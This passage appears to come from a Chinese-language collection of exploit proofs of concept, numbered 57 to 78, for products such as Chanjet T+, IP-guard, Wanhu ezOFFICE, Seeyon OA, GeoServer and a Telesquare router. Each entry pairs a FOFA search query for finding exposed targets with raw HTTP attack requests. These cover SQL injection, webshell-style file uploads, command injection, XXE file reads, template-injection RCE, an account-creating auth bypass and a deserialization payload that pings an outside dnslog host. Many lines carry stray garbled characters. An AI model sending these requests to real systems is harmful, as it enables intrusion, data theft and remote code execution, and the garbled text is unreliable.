"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
, J9 _# R! a$ x, i4 y Z% W "MethodName":"Start",: K/ i, |4 Y5 q. C$ u1 p
"ObjectInstance":{
; I1 g2 e |% p7 G- B! c: A "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",3 S5 ?4 Z& X1 i3 K# I4 m
"StartInfo": {# q5 Q* ^8 { D7 P6 L0 J) t) {; s
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
0 n$ G* q9 I) U# Z! Q "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"$ t5 T& J9 U5 C
}
4 P% C) a1 O' i% C+ E* R* O0 D) G }- C( `8 _" @' ]3 R9 Q! y
}
+ n( a: X r: i* J" p$ J1 k}( K7 C6 G' Z3 d
, }, I3 j" F: ]) a* q
6 E; a) @- t K4 j \57. 畅捷通T+ keyEdit.aspx SQL注入
* A* A0 }, h& \$ S' WFOFA:app="畅捷通-TPlus"
/ h& h/ I# q% P8 M' b& z( E6 ^5 _GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
; g) C8 a) |& B$ z0 qHost: host
) I$ W2 }: U6 qUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36' C( D; v. J9 f1 z, W& l
Accept-Charset: utf-8& e' D3 @' B! O2 T
Accept-Encoding: gzip, deflate
+ f, y8 W4 l" S; N. W; hConnection: close7 O q8 q8 v+ C& j B6 M
0 G" n3 S0 Q4 Y$ d& s( c _
0 ~; ~0 V1 ]+ e1 I4 F58. 畅捷通T+ KeyInfoList.aspx sql注入
% U; A" X3 ~0 k* `' o0 l& `FOFA:app="畅捷通-TPlus"
5 N& q+ Y# E% f2 X% TGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
( m5 g) }1 n* Y* PHost: your-ip y& m+ Q# F \. I! R8 m( S
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.369 t; }. {$ E& f
Accept-Charset: utf-8
, W. X1 r$ N; w+ t9 u; CAccept-Encoding: gzip, deflate
7 D" U" F9 t: l3 F3 hConnection: close s- P9 v, `3 y; B7 p+ P% s
. j5 j, u6 Q9 T3 i1 p- x+ ?: `1 e* x: G
* ^# D5 L# I8 S4 i1 H59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
& `, Z+ I* W: X) D9 DFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
' }; s+ l& x! v% Q9 QPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1* \* `9 K8 P5 C0 K" x- P
Host: 192.168.86.128:9090
/ Q- H7 h2 G$ AUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
* c# x. G, r; R( [( Y/ YConnection: close
5 ?; _% s1 R, s7 i+ c% Z; pContent-Length: 16697 j1 j6 }2 p. ?0 ^& X$ E
Accept: */** Q E8 L/ w1 e6 @! [5 }5 K
Accept-Language: en1 D' F% f6 `& p( G
Content-Type: application/x-www-form-urlencoded4 q9 o z, J- A2 G- z+ G9 L* c5 t
Accept-Encoding: gzip- Q8 K3 h8 ~5 E, C$ u, A `
^+ @: O9 B: F+ y* e- i- XPAYLOAD
3 r* a! a( G" {4 g f& p8 N! o2 Q. ~8 ~/ z) Y+ A9 u/ Q( b' B
' \/ z8 T, G4 g4 B% A4 B& {: a
60. 百卓Smart管理平台 importexport.php SQL注入: ^( D8 v5 i2 H8 G& p/ k
FOFA:title="Smart管理平台"
: O! ^4 a7 f7 l$ EGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1/ }3 Y( ^( b' S+ E/ v3 @9 O8 v
Host:+ L6 c/ b4 R' [' z+ ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36# k! y# @5 n ` R6 O3 b% f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7( X8 W7 |) A$ n1 ~0 x; A5 t
Accept-Encoding: gzip, deflate( a: t7 ^6 m4 I8 g. w- c8 D) n
Accept-Language: zh-CN,zh;q=0.9
. e: _0 e# u' N3 Z d2 kConnection: close0 ?* p! u2 h. x) k3 W4 g
& h) ^: T N# V' L; Q& m
: S/ A6 j. i0 b3 l) P. b2 t61. 浙大恩特客户资源管理系统 fileupload 任意文件上传' _9 G! p. X8 O4 Z1 V$ ^% j
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
1 Y; V$ ?" f" @5 J3 j' {% z% r! A6 BPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
6 @/ z4 f0 N# pHost: x.x.x.x- f0 j- t3 q3 z, H8 x, W
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" \0 Z1 B) Y4 f6 I3 X" ]& Q
Connection: close
( n' v( N' q4 h! p& F+ }3 eContent-Length: 275 p/ t: A; ~9 K) l
Accept: */*
: Z" B9 `- f) r: }- V, b& P$ LAccept-Encoding: gzip, deflate
- b* {- `% u" T1 ]( K$ @/ iAccept-Language: en& _* X E2 ]! W+ ] Q$ D5 t) t$ V
Content-Type: application/x-www-form-urlencoded" A; [3 ~ J7 U% G
5 S& v# ^+ x1 T( C: R3 J. B* Z% j
8uxssX66eqrqtKObcVa0kid98xa
& u! M, ?7 R4 y1 d. [; V8 m# j2 `5 k% c$ @
. z2 R0 x& D i+ C: x" L62. IP-guard WebServer 远程命令执行
3 U9 U. L; c. g3 r+ NFOFA:"IP-guard" && icon_hash="2030860561"( Y# g5 L! t- g, q0 }9 F; m: P- O8 K
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1+ x3 p8 Y/ i) i- I0 i8 Z1 o! d
Host: x.x.x.x7 A% e$ j p2 F2 d
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.360 O/ p+ k$ e5 U. F3 `3 z, j
Connection: close5 k/ R! s. X- w# a
Accept: */*/ F. l" ]0 b3 @4 ~* W3 ~6 R
Accept-Language: en! M b& ^# Z; s J) D3 D
Accept-Encoding: gzip) d6 [. j: B5 _/ U0 {2 ^
) C9 }0 F' m3 L5 L! ~6 A- r4 L2 y9 |& ^% v) ]/ ]- ^0 a& T' z3 z: w: O2 m' g
访问
* l+ b+ E3 h- a6 f- l- e
2 [9 f2 a, o1 O! bGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.15 B( J& J! H& ^! M( m9 K2 K
Host: x.x.x.x6 G3 y( k' H# q) [' k3 S
3 ] P m8 j y3 M
# d1 j/ j% X$ N; @# q5 \
63. IP-guard WebServer任意文件读取
2 u- R3 C$ i& q- r9 G3 hIP-guard < 4.82.0609.0
5 }5 ]/ D a5 {/ mFOFA:icon_hash="2030860561"9 l, ]7 h" y$ `. p- d
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
6 K0 ]" L( c$ `' B% J' EHost: your-ip
5 z# } o& u7 X4 D wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36% j1 j1 L0 |& |; M" g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 u0 w1 |. b, _( T. ^
Accept-Encoding: gzip, deflate
7 V, o9 Q0 `$ I! XAccept-Language: zh-CN,zh;q=0.9
8 a. D& Q: S; q4 [7 rConnection: close
+ M3 _2 b9 w) E7 A5 V+ mContent-Type: application/x-www-form-urlencoded0 E- S m2 t* `9 u4 k0 \" Q7 ?
) i6 O: l$ E2 e) Z, h2 {4 O2 [
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
* P. V) T, p7 C
' [4 p+ J% N4 @' W0 W( J64. 捷诚管理信息系统CWSFinanceCommon SQL注入
2 ^( i' x, |$ o+ D' m/ Q/ XFOFA:body="/Scripts/EnjoyMsg.js"
9 u( N! x/ v5 C# sPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
e, X5 N8 }" H9 l: RHost: 192.168.86.128:9001
( d) i% y3 Y& o! G0 N9 uUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
4 ^1 I# ^ N" PConnection: close
, N0 F& f( j3 Z1 ?3 F! T, H' UContent-Length: 3695 L3 g7 X$ ]. O. B
Accept: */*
2 p4 h2 p7 l! E; d5 g; e! K% G+ SAccept-Language: en- T& Q% ]% v- I) E8 v5 V
Content-Type: text/xml; charset=utf-8
8 F0 M4 d* E1 `$ E# EAccept-Encoding: gzip; n/ \" z% S, H8 F
4 ?2 c" Y" Y" T- i8 U$ _5 B<?xml version="1.0" encoding="utf-8"?>; g D( ^7 o1 g& l5 ^" i
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">1 C7 k$ i! l! e3 n
<soap:Body>: n! i: B4 _8 B6 H$ E/ d( Y* {
<GetOSpById xmlns="http://tempuri.org/">
0 _! k! k) V9 P- O <sId>1';waitfor delay '0:0:5'--+</sId>
% s% k7 a5 }. {1 c U& \* t/ b </GetOSpById>
4 v: h$ K$ k. O1 d3 B3 d. g; x5 r+ z </soap:Body>+ Y; x1 ]# u4 c
</soap:Envelope>1 U8 |+ | A& F
- ~$ _6 B4 ~! i) l, d5 l( o( {
6 B* S$ h) @/ j; ^65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
& j" J) p |) y. X# DFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
5 h0 ]" M# H* G7 d$ L @) H# r响应200即成功创建账号test123456/123456
* \7 q5 p7 D+ f' YPOST /SystemMng.ashx HTTP/1.1
2 P9 ?2 _2 [0 U/ y- X u bHost: p9 C! ?+ Q3 \( Y
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
# K2 E* i* m1 {5 qAccept-Encoding: gzip, deflate5 Y& U4 h5 I- |/ _* A% g6 X9 w
Accept: */*
/ M4 [5 [) P$ P9 ?Connection: close
4 b9 B- ~! r, R: N: m; W" d( M5 YAccept-Language: en
9 b9 A" }* j) e) D2 `Content-Length: 174; G# Q( [. {# w! L4 F, `
" G8 n9 k- Z* {# A# goperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators9 O$ H. X5 {( W: v( ~; ]- k
' b' e7 ~/ n! f! R' y
7 L9 h. T6 ^, u: w" F) [66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入+ Z2 X2 b8 M% U1 Y
FOFA:app="万户ezOFFICE协同管理平台"$ D( G2 i1 G0 _
9 Q3 `& o$ \( W- ?2 HGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
: J: p# R) |$ E9 G: E: N( `( i- Q8 eHost: x.x.x.x
# B* ~, ]2 o. NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
6 V8 H; b* e; d& `, H% i# V( kConnection: close, }4 f6 U B* O3 o3 {
Accept: */*
$ x6 G9 W* p/ Q! HAccept-Language: en* I6 y" f/ d; t4 d- B
Accept-Encoding: gzip1 I, r2 E- K6 ]3 W2 Y( A" A! n6 S0 o
* F: a, s {9 g% W/ s/ i: Z) ]) M# @) w) t+ Y% ?5 g
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
. u- }. S- `1 J" O0 D( L4 U- p; t- j
67. 万户ezOFFICE wpsservlet任意文件上传2 E' K4 {# s7 s& `, G8 z7 B/ [, K
FOFA:app="万户网络-ezOFFICE"
+ ?$ H' p) i! P. c/ m& ~newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
' v$ }3 D1 a7 }+ O p; ^1 ?4 PPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
3 `! ^0 p0 m4 x, DHost: x.x.x.x
/ j9 I( X. Y3 x& E1 T3 L3 _User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.01 k) P6 `1 G: b" @7 }0 W
Content-Length: 173( H6 |; Q7 h9 T$ n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8* p" O+ Y: m; _- C8 O7 s5 L
Accept-Encoding: gzip, deflate
6 r! O6 z# L& o% o$ DAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 q/ ~/ U; [4 ~
Connection: close. `. t& X) P. x7 ?# x# h: |2 f
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
$ A* k0 L/ T m mDNT: 1 i" s( j5 n r, |% ~$ S( S) c
Upgrade-Insecure-Requests: 1
4 }3 y; J0 N a' ^+ _. V4 D9 U% \. C9 P3 w
--ufuadpxathqvxfqnuyuqaozvseiueerp8 L2 z3 D% P: s" q$ E
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
( m5 ]5 c) D* U# ?' C
: j4 ?7 ]' a- x<% out.print("sasdfghjkj");%>
. S" x; u! C# W& k# b& o |--ufuadpxathqvxfqnuyuqaozvseiueerp--
, o* ~+ O4 B& G# ]3 |2 O8 R0 y, Y& }" P9 J4 x$ A' ~1 [
: W' q% v& z3 I+ O9 O- c
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
( U1 ~; a& ?+ u/ A! ?2 n
2 E+ a% M" F( B, k$ y# {: ]5 `0 R68. 万户ezOFFICE wf_printnum.jsp SQL注入
3 O( _& i8 Q' R- iFOFA:app="万户ezOFFICE协同管理平台"
3 W" E9 Z) e7 {# P' ?GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
9 w3 U. C8 T; \) _- h3 }+ Y5 l, D9 y" g+ ~Host: {{host}}
5 x% O, }* H$ |1 w' n( L8 ^2 TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36' l6 V/ Q; d1 e
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
9 u( v5 s- c( G+ I8 v" oAccept-Encoding: gzip, deflate
# y3 u' }8 L! e' y( c, s* OAccept-Language: zh-CN,zh;q=0.97 r; `0 }6 _5 B) g1 ]
Connection: close
0 O/ Y1 R, ]" E6 j" Y; ?/ j
8 W$ |5 A, S+ L9 e: R- x
+ k+ I9 W% H- I7 X69. 万户 ezOFFICE contract_gd.jsp SQL注入* k: b' d7 ^* v4 M, }2 W9 y
FOFA:app="万户ezOFFICE协同管理平台"
- Y% R' k+ H: b( y8 R' y1 i7 fGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
2 D. ^) U6 a& i. w) mHost: your-ip
% y3 w$ ^+ V# ~! ]$ PUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
9 l9 l" r: h) R2 A( D$ RAccept-Encoding: gzip, deflate
( o$ a, w" {) _* v5 n5 u) d, lAccept: */*
( N v$ Q8 {8 ?0 NConnection: keep-alive. M0 Q- t0 ^$ t9 }
- [$ t. W/ p& B" e: S( [. _; H m
5 x& o, l: n4 s' u; |" @
70. 万户ezEIP success 命令执行
/ f4 a1 P7 K# P1 Y2 X7 fFOFA:app="万户网络-ezEIP". B6 A; c/ F5 P' J( K3 H2 Q
POST /member/success.aspx HTTP/1.1* e4 ?6 o3 u: j7 L8 @
Host: {{Hostname}}# S$ Z5 B' |& T1 _. Y9 u% |" V& W" |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
4 s. e& Q. h$ u+ g6 e* E( _SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=6 Q! V8 ^2 v4 l, U% z' S: W
Content-Type: application/x-www-form-urlencoded
1 X" i7 @ V0 U6 J" [9 Z" @8 pTYPE: C5 A! `2 q5 M3 u3 U
Content-Length: 16702! G: e1 F) N0 S" D
4 H' Z+ ?* f5 b8 O# B$ c+ Y) d: ]__VIEWSTATE=PAYLOAD
s7 j0 q' N/ p, D7 j- R' x2 s
4 n7 y% X# P: i, ?
/ e( A5 C1 ]6 O' O# H; P71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入# u! q$ u# d, E; U# w# Z1 R9 ~
FOFA:body="PM2项目管理系统BS版增强工具.zip"2 Q0 {: x$ }2 _$ L" W9 N, V
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1' i* {6 F* U# |& y! U! A; q
Host: x.x.x.xx.x.x.x
# K* h8 m/ r* w4 C1 `User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.365 h, }+ |# O7 V P9 ^: O& k
Connection: close
?) F0 ?7 j- A5 ?. dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: y& E' ~+ I5 d N1 b' |
Accept-Encoding: gzip, deflate
0 i- G: P: I0 R+ f$ j* j+ Z$ |Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; q' A. _/ G. p5 y; J+ @" C) a
Upgrade-Insecure-Requests: 1( U: M3 D _7 H
5 I3 T# V" x; g! L3 Z# J; q
& C$ J3 W/ c: i0 A& Z: B; L72. 致远OA getAjaxDataServlet XXE
1 \2 K9 ?- E2 zFOFA:app="致远互联-OA"
7 h$ J( r+ _1 KPOST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
/ [* _6 k; Y7 }% ^/ ~( c: U$ FHost: 192.168.40.131:8099) t' A2 z3 @+ i9 D
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
7 p8 p: \. M/ ]0 M" n* c; D M& b e" DConnection: close( \+ ~, y/ C4 h1 ?$ O
Content-Length: 5835 M$ ^2 c2 q4 g6 I+ i* j
Content-Type: application/x-www-form-urlencoded
* c N5 ]! o1 k) i3 ~2 `5 fAccept-Encoding: gzip
; C0 g$ v( i+ ^# z+ R; ]
' X! g0 e# u4 P. _S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E0 H3 M) P$ k+ p3 X1 A
1 e U6 u" G0 P$ w' O; i% a. [1 k6 p8 X0 L
73. GeoServer wms远程代码执行
6 J& j7 m* J4 g$ iFOFA:icon_hash=”97540678”
* g" h. n* o( @" N$ C$ {3 F( n+ |POST /geoserver/wms HTTP/1.1) J# Z: u) ~* ]
Host:1 p. H2 J& }9 i- k
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
) U+ @$ O( {& x9 u0 ? EContent-Length: 19814 K5 I( |$ l1 d* B. a! o" f: j
Accept-Encoding: gzip, deflate: \- i0 G4 x- |6 H# \3 A
Connection: close
: j, `2 [+ |; B* YContent-Type: application/xml( a& m( {) u6 M5 h
SL-CE-SUID: 3& g$ `* k* R! f3 P# C6 ]) K
+ V7 A# `4 u6 N3 j
PAYLOAD
+ `/ o6 i* z) k1 O! m- f/ ^/ ]! K2 [! x- {/ f& }9 O
* _( x0 H7 L, l, u; [7 E
74. 致远M3-server 6_1sp1 反序列化RCE
* K" a, E$ i: B" Y/ [, bFOFA:title="M3-Server"- m: ^4 h* \4 Y) a
PAYLOAD
4 l& t; _ J9 p& X- ~9 D7 O" Y+ |7 Q8 O$ O# |( e
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
0 ^1 Q9 L V/ O! yFOFA:app="TELESQUARE-TLR-2005KSH"7 }' L7 D0 o t; L8 U
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1$ y+ Q* D; D ^2 I
Host: x.x.x.x0 G/ g# H5 N, b; V! r2 g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 s6 f; D+ _& \0 @Connection: close+ k% [" j; q$ D
Accept: */*
& V- C# u5 x1 F/ j3 }Accept-Language: en
7 z H8 x9 D: e( ^& _' c0 h$ U2 @6 a3 G4 mAccept-Encoding: gzip
+ {2 {; V. b/ `( i" E4 x6 e7 t$ H& m3 j- i) X! t, h
9 Y o4 o5 z) X3 l" kGET /cgi-bin/test28256.txt HTTP/1.13 u1 t- U" C; ^ s4 A' t6 \, v
Host: x.x.x.x
' s8 o6 W1 y4 X- Q8 P+ l/ H
- q8 k r7 [, b8 G6 p" Y6 Y
. ^- N* X/ r/ {& ]76. 新开普掌上校园服务管理平台service.action远程命令执行6 J3 e$ g8 S; j7 i% T- `
FOFA:title="掌上校园服务管理平台") `4 s9 \) H0 o& F2 I
POST /service_transport/service.action HTTP/1.1 ]2 B/ e) O# l0 |+ |' l O
Host: x.x.x.x
& ^9 U2 ~; w- S' ^$ \9 IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
& J8 C, B5 Y5 i6 F" e: Z5 HConnection: close
* ^& u* v- K7 A9 mContent-Length: 211
' C p9 V. ]3 X( v. ]: M) NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ l E/ d* S8 E# `/ AAccept-Encoding: gzip, deflate
* z# A. c3 J- L# y9 c- yAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ S& w, _5 x/ ^; c* O* W& A) w
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
8 {$ A( I% Y$ \: YUpgrade-Insecure-Requests: 10 r8 C1 \$ F' ^. c: W4 z3 T8 @6 M# P
) z+ X) y' f. r% `* l" X$ s: U{
) ~+ @1 o5 M+ T"command": "GetFZinfo",
) Z+ y" v/ w+ m6 Y- j$ e' h "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
7 a% L, j7 g- Y8 [5 d2 V" T ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
# N6 [" p, C: J* g}4 I1 {3 P5 X0 u! e y' ^; Q
, R1 @' ]6 ?( c6 E# x" b
" L1 \, I& Z/ J: Z
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1' q8 j( P: ~; I# ~# i8 m& _
Host: x.x.x.x
4 i& ]9 x- C& u9 |; j, |4 V" V9 N( ^" H4 ^ Q9 ]$ S
1 j. m5 ^" Q8 X3 J; _7 J8 Q) y3 h: V' Q5 D/ M( D2 \9 n
77. F22服装管理软件系统UploadHandler.ashx任意文件上传7 n. {( Y8 q! \" r4 G8 J; L
FOFA:body="F22WEB登陆"
0 u4 Q. W- [/ APOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1+ L% J5 q- z3 ~) Z% j9 b& O
Host: x.x.x.x
. {3 J5 M/ `6 ?; s1 F8 e8 V9 OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
! R* [: d* L3 c# x- B3 g0 J4 {$ ~# aConnection: close1 O7 L$ u0 m1 s0 s! w, P3 l' t8 N( w
Content-Length: 4336 ?4 k2 t( Z2 ]! z: _2 {
Accept: */*% `( W4 h8 ~9 V% @0 P
Accept-Encoding: gzip, deflate
, \- p% G1 Q/ iAccept-Language: zh-CN,zh;q=0.94 e6 H2 |. u0 n8 K1 i, ~
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix0 g* m5 t" e D# L5 A
# m) E+ i- y; w9 Q! Y" A
------------398jnjVTTlDVXHlE7yYnfwBoix# m! \9 P) @" f# ?+ X
Content-Disposition: form-data; name="folder"
U b; p! A5 q( }
$ a, V2 _( B9 D9 w/upload/udplog# Z6 B$ G! N5 L1 B5 L
------------398jnjVTTlDVXHlE7yYnfwBoix- Q; i0 f) f. C" O/ \7 p
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"6 X0 j' e* v- E3 N$ [
Content-Type: application/octet-stream
- o0 Z) w7 L5 o1 {+ D* D" v. o: l5 |/ c7 g0 y j0 X
hello1234567. }: p- Y1 d6 `) h2 e/ M2 {
------------398jnjVTTlDVXHlE7yYnfwBoix" R( \! A% p) z2 U! d C, D
Content-Disposition: form-data; name="Upload"
$ G2 s3 O2 o/ A* ~1 C6 m: Z; E) X
Submit Query
# O/ C$ j5 f: j8 H1 q------------398jnjVTTlDVXHlE7yYnfwBoix--
@3 h% g! P a: c" [' e7 U. a+ C) Q) q
0 a5 V! x4 y3 b9 ^& T" f
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传+ R, r) `% o% h1 d
FOFA:icon_hash="2001627082"/ F2 Q4 X- e5 G' T
POST /Platform/System/FileUpload.ashx HTTP/1.1
D. B4 C" c/ W; M8 Q- ?Host: x.x.x.x
8 B6 U& s+ z: [' Q8 V% \/ LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! F3 c, w7 f) N! @5 P0 y/ XConnection: close# ^& a( h5 J5 z- h" k% M
Content-Length: 336
1 Y0 Z3 o# p# I3 W" d" w3 aAccept-Encoding: gzip
5 `; Y0 K& v0 O ]* k+ XContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l, X- V2 G0 H* v0 L
1 K1 e8 y; [, Z0 U0 V9 D
------YsOxWxSvj1KyZow1PTsh98fdu6l9 ]3 ]: Y! n& C* u9 E
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"4 h4 d$ h0 k, x2 F8 s
Content-Type: image/png
( k, y& @9 o5 `$ Y) E: h* D2 X
- ^, j, {- s1 z2 w) q. D, WYsOxWxSvj1KyZow1PTsh98fdu6l
9 }9 r9 K) B4 {# s' J& k------YsOxWxSvj1KyZow1PTsh98fdu6l
7 T" \% l( X0 fContent-Disposition: form-data; name="target"! B, O- }& ^8 Q& L" M) Y% ^
5 {. `6 }6 e% K4 b& L/Applications/SkillDevelopAndEHS/# l- W! D; U5 k/ j& z3 N. L/ [/ g
